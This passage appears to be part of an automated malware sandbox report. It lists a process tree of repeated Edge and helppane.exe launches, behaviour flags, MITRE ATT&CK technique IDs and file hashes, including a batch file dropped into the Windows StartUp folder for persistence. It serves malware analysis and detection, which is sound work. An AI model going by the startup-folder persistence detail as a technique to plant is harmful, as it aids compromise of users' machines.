- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:7412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:3624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:7316
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:8224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:8240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:8320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:8456
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:8512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:8548
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:8636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:8652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:8728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:9924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:9984
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,14064491967227875370,158516036671409141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
    3⤵
    PID:12604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:10172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:1808
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,4630022350922418636,17293608919436239082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:10048
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:6312
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,12239755432391695992,4482073532119366475,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 /prefetch:3
    3⤵
    PID:12928

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:9620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:9920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:8656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,7678006172058598383,3049471400211288616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:3
    3⤵
    PID:11696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:9916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:5208
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,15749862175497407532,803674049161705704,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
    3⤵
    PID:8684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:4468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:5148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,4663149849329047964,14339299886798805609,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:11724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:5368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:9968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,13647487725379823403,15642265078819116340,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3
    3⤵
    PID:12728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:4080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:1952
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,3490872568087485468,4593135343718769316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:12596
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 9620 -s 2184
  2⤵
  PID:7540

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:10704

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:13436

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:11632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:10896
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:7092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,12931061958254336975,13400461907385233697,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
    3⤵
    PID:13568
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,12931061958254336975,13400461907385233697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:6780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:12820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,14169837125758000567,10606923418343854076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:6972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:10372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1444,952795721217284793,6258121324983865802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:14056

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4308

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:10888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Sakpot.bat

Filesize
1KB

MD5
df2facada7cbea4b1917fd7a52237e99

SHA1
64a7c8f6a8bbd2ec21ab836ac25dc9885d38ee8c

SHA256
ef5562a3888f33d8de016b029f2baa7db6a094ec24e17a95eef47d3a7ecc1cab

SHA512
debb1d705972f0044e1807bf470beef8ffd1f054a96215ee0db8a649b96981df0bb560e8ac32537e72454ba5a78063805f3a3787c6e954aaf4cf93606769a846

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
54aadd2d8ec66e446f1edb466b99ba8d

SHA1
a94f02b035dc918d8d9a46e6886413f15be5bff0

SHA256
1971045943002ef01930add9ba1a96a92ddc10d6c581ce29e33c38c2120b130e

SHA512
7e077f903463da60b5587aed4f5352060df400ebda713b602b88c15cb2f91076531ea07546a9352df772656065e0bf27bd285905a60f036a5c5951076d35e994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d5bd48a26607260dacc9c189630447d1

SHA1
9a01d2e814ca4380ea7fdfd3d4441173c8f252dc

SHA256
ed8890054be68fcd07c687f4a40fb1f2abd8a04c471d4e0e32998ac6023c21f6

SHA512
8b52f6918b15e95131fd9883645be250d4faafae5b58d5fe33d8392f3303b17081627abcbc5e21368611a83a65ef17068146200c3f269776cf68bd239afd3dc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7c9aef2f199b0b08e11a96cefe487de7

SHA1
7702617c60884470d2285fb538cbb9da58e93b1f

SHA256
e430ba5c24fa4e612e758ef99ed6a5969824ad86acfd9622b6af2b57aece5ac3

SHA512
15152a9f59566b124786cfb1bce8333d08ff437ba2fbc6be49498d49f1c1dbbdf68cf85962195e7a34b1c065f4811a7d4431d62b718f62dbd892dd99ef1e65f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2f842025e22e522658c640cfc7edc529

SHA1
4c2b24b02709acdd159f1b9bbeb396e52af27033

SHA256
1191573f2a7c12f0b9b8460e06dc36ca5386305eb8c883ebbbc8eb15f4d8e23e

SHA512
6e4393fd43984722229020ef662fc5981f253de31f13f30fadd6660bbc9ededcbfd163f132f6adaf42d435873322a5d0d3eea60060cf0e7f2e256262632c5d05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5e13cda38ff5f651fc9ad3d510d993dd

SHA1
c423f85caa0ad5841f8dd6dcbbc6542a4c4c378e

SHA256
d07dd80f6978949eb9e27408bd4b7f1d9f079421a3db075fcde98b505270e756

SHA512
734ba4eebaf1ae432aab6222991e85c8583903a1bae6dd31bda6b6e805724f5deff9632d736ea5a0b5642b2d7adb179713f1d88be2e3b84f446e64b401741ebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
528B

MD5
5e97cb8d82ceedda40183f42506b2a6a

SHA1
d24777975a9ddea752b452003e0893ec2313eca9

SHA256
ec874fc3ef1fb04892c85d75c8331f2986977d46d6a838177cd8d942a1097b49

SHA512
4ad47828c86feb25d95f8d8dd424bf8c93ebcc0d5429f3472140e21537236566174138fccf961031c18bff7a01229934ccadc3375ca61937a0288706a510ad61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
189B

MD5
1c71d79b135a68f3ecbc4ae68c2dc88d

SHA1
aafa539f26effcddc6a2ccb828433445e37fc2eb

SHA256
1e463ad8d85bf63ddfae93296b5de4b8c69041f3f95eb1b39c1126cf2eba3591

SHA512
